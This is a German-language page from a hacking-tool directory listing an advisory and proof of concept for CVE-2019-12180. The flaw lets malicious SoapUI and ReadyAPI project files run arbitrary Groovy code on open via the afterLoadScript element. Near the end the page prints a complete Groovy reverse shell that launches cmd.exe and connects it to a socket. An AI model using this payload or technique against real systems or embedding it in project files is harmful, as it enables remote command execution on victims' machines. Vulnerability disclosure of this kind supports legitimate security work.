Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2019-12180 — Advisory und Proof of Concept für CVE-2019-12180, das die Ausführung beliebigen Groovy-Codes in SoapUI und ReadyAPI über bösartige Projektdateien demonstriert. | Kitploit
Tools/GitHubGitHub/0x-nope/cve-2019-12180
SchwachstellenanalyseCode-AnalyseExploitationWebanwendungs-ExploitationPenetrationstestsPayload-Entwicklung
GitHub0x-nope/cve-2019-12180

CVE-2019-12180

Advisory und Proof of Concept für CVE-2019-12180, das die Ausführung beliebigen Groovy-Codes in SoapUI und ReadyAPI über bösartige Projektdateien demonstriert.

Repository anzeigen
4237vor 6 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2019-12180

Advisory & PoC

SoapUI und ReadyAPI ermöglichen es, dynamische Inhalte zu Testfällen hinzuzufügen (z. B. zur Berechnung eines Zeitstempels im laufenden Betrieb) mittels Apache Groovy Language Skripten. Die Ausführung dieser Skripte kann auf viele Arten ausgelöst werden, und sie werden beim Speichern eines Projekts in der XML-„Projektdatei“ gespeichert.

Die Funktion „Load Script“ ermöglicht es, ein Groovy-Skript zu erstellen, das beim Öffnen der Projektdatei gestartet wird (Element con:afterLoadScript der XML-Projektdatei), ohne weitere Benutzerinteraktion. Dieses Verhalten kann von einem Angreifer missbraucht werden, um bösartige Projektdateien zu erstellen, die nach dem Öffnen beliebigen Groovy-Code auf dem Opfersystem ausführen. Da es mit der Groovy-Sprache möglich ist, Systembefehle auszuführen, kann diese Funktion effektiv zur Ausführung von Remote-Befehlen missbraucht werden.

HINWEIS: Das gleiche Ziel kann durch die Ausnutzung jeder anderen Groovy-Skript-fähigen Funktion (z. B. „Save Script“) erreicht werden, dies erfordert jedoch nach dem Laden der Projektdatei zusätzliche Benutzerinteraktion.

Verwundbare Anwendungen:

  • ReadyAPI 3.0.0
  • 2.8.2 und früher
  • SoapUI 5.5 und früher

Zum Zeitpunkt der Erstellung dieses Textes (2020-02-04) handelt es sich um eine 0day-Schwachstelle, da (mehrere) vorgeschlagene Offenlegungstermine verstrichen sind, ohne dass der Anbieter einen Patch veröffentlicht hat.

Beispiel Groovy Reverse Shell (https://gist.github.com/frohoff/fed1ffaab9b9beeb1c76):

String host="localhost"; int port=8044; String cmd="cmd.exe"; Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();

Tool herunterladen